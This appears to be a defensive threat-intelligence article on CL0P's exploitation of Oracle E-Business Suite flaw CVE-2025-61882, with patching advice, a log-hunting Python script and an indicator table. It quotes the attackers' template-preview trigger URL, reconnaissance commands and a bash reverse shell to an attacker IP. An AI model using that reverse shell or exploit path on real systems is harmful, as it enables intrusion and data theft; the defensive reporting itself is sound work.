Organizations using Oracle E-Business Suite must apply the October 4 emergency patches immediately to mitigate active, in-the-wild exploitation by CL0P extortion actors and hunt for malicious templates in their databases.
Beginning September 29, 2025, Google Threat Intelligence Group (GTIG) and Mandiant identified a massive email campaign targeting executives at dozens of organizations, alleging theft of sensitive data from Oracle E-Business Suite (EBS) environments.
The extortion messages, sent from hundreds of compromised third-party accounts, included legitimate file listings dating back to mid-August. Although no victims have yet appeared on the CL0P DLS, past campaigns suggest data may be published several weeks after the initial outreach.
On October 2, Oracle reported that exploited vulnerabilities had been patched in July’s Critical Patch Update and urged customers to apply the latest CPU immediately.
Two days later, Oracle released emergency fixes specifically addressing CVE-2025-61882 and reiterated the need to stay current on all patches.
Multi-Stage Java Implant Framework
GTIG’s analysis attributes the campaign to a CL0P actor leveraging months of intrusion activity. Initial exploitation may have begun as early as July 10, but by August 9, a zero-day vulnerability—CVE-2025-61882—was in active use against UiServlet and SyncServlet components.
The multi-stage Java implant framework combines Server-Side Request Forgery, CRLF injection, authentication bypass, and XSL template injection to achieve remote code execution.
In August, attackers exploited SyncServlet via:
POST /OA_HTML/SyncServlet
They then abused the XDO Template Manager to upload malicious XSL payloads to the XDO_TEMPLATES_B table. A template preview request such as:
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=TMP|DEF<16_RANDOM_HEX>&TemplateType=XSL-TEXT
triggers payload execution. The XSL payload decodes a Base64 Java implant, instantiates a ScriptEngine, and evaluates attacker-controlled code.
Examples of commands executed under the “applmgr” account include system reconnaissance (cat /etc/fstab, df -h, ip addr) and reverse shell connections:
bash -i >& /dev/tcp/200.107.207.26/53 0>&1
Two distinct Java chains—GOLDVEIN.JAVA downloader and a nested SAGE* reflective loader sequence culminating in SAGEWAVE—enable second-stage payload retrieval and persistent filter installation.
Actionable Guidance
The critical first step is immediate patching: apply Oracle's October 4 emergency patches for CVE-2025-61882 without delay. Following patch deployment, defenders should hunt for malicious templates:
Review entries where TEMPLATE_CODE begins with “TMP” or “DEF.” Restrict outbound Internet access from EBS servers to block C2 communications.
This campaign underscores the strategic advantage of coupling zero-day exploitation with delayed extortion. By targeting public-facing enterprise applications, CL0P-affiliated actors can rapidly exfiltrate data at scale while evading early detection.
Monitor network logs for anomalous requests to /OA_HTML/configurator/UiServlet and the TemplatePreviewPG endpoint. Leverage memory forensics on Java processes to detect in-memory implants not visible on disk.
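A hunting script, added here as an illustration and not part of the original report or of Google's or Oracle's tooling: it flags, in web access logs, the servlet paths, the TemplatePreviewPG requests whose TemplateCode begins with TMP or DEF, the SAGEWAVE path substring and the IP indicators listed on this page, and it filters an export of XDO_TEMPLATES_B template codes the same way. It assumes a common/combined access-log layout; the sample lines are constructed, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators and paths quoted in the report above.
IOC_IPS = {"200.107.207.26", "161.97.99.49", "162.55.17.215", "104.194.11.200"}
SERVLET_PATHS = {"/OA_HTML/configurator/UiServlet", "/OA_HTML/SyncServlet"}
PREVIEW_PAGE = "/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG"
SAGEWAVE_SUBSTR = "/help/state/content/destination./navId.1/navvSetId.iHelp/"
TEMPLATE_PREFIXES = ("TMP", "DEF")
# Assumed common/combined access-log layout; adjust to the EBS web tier's actual format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def is_suspect_template_code(code):
    """TEMPLATE_CODE values beginning with TMP or DEF, the pattern the report says to review."""
    return code.upper().startswith(TEMPLATE_PREFIXES)

def hunt_templates(template_codes):
    """Filter an export of XDO_TEMPLATES_B.TEMPLATE_CODE down to the entries worth reviewing."""
    return [c for c in template_codes if is_suspect_template_code(c)]

def classify_request(line):
    """Return (client_ip, path, [indicators]) for a matching line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    query = parse_qs(parts.query)  # percent-decodes values, so %7C becomes |
    hits = []
    if m["ip"] in IOC_IPS:
        hits.append("ioc-ip")
    if parts.path in SERVLET_PATHS:
        hits.append("servlet")
    if parts.path == "/OA_HTML/OA.jsp" and PREVIEW_PAGE in query.get("page", []):
        if any(is_suspect_template_code(c) for c in query.get("TemplateCode", [])):
            hits.append("template-preview")
    if SAGEWAVE_SUBSTR in parts.path:
        hits.append("sagewave-filter")
    return (m["ip"], parts.path, hits) if hits else None

def scan(lines):
    """Run classify_request over log lines, keeping only the matches."""
    return [r for r in map(classify_request, lines) if r]

# Constructed sample lines (not real traffic): one hit per indicator plus a benign preview.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Oct/2025:10:00:01 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=TMP0123456789abcdef&TemplateType=XSL-TEXT HTTP/1.1" 200 512',
    '200.107.207.26 - - [05/Oct/2025:10:00:02 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 64',
    '10.0.0.7 - - [05/Oct/2025:10:00:03 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=XXINVOICE&TemplateType=XSL-TEXT HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Oct/2025:10:00:04 +0000] "GET /help/state/content/destination./navId.1/navvSetId.iHelp/ HTTP/1.1" 200 10',
]
```

Calling scan(SAMPLE_LOG) flags three of the four lines; the preview of a template code that does not start with TMP or DEF is left alone.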
Given CL0P's history of leveraging zero-days from 2020 through 2025, organizations must assume they remain prime targets and maintain rigorous patch and monitoring regimes.
Indicators of Compromise
Type | Indicator | Description |
---|---|---|
Network | 200.107.207.26 | IP address observed in exploitation attempts targeting UiServlet and SyncServlet components. |
Network | 161.97.99.49 | IP address observed in exploitation attempts targeting the UiServlet component. |
Network | 162.55.17.215:443 | GOLDVEIN.JAVA C2 |
Network | 104.194.11.200:443 | GOLDVEIN.JAVA C2 |
Network | /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG… | Indicator of an attempt to trigger the malicious XSL payload. Look for requests where TemplateCode begins with TMP or DEF. |
Network | /OA_HTML/configurator/UiServlet | Endpoint targeted in the July 2025 exploitation activity. |
Network | /OA_HTML/SyncServlet | Endpoint targeted in the August 2025 exploitation activity. |
Network | /help/state/content/destination./navId.1/navvSetId.iHelp/ | HTTP path substring filtered for by SAGEWAVE |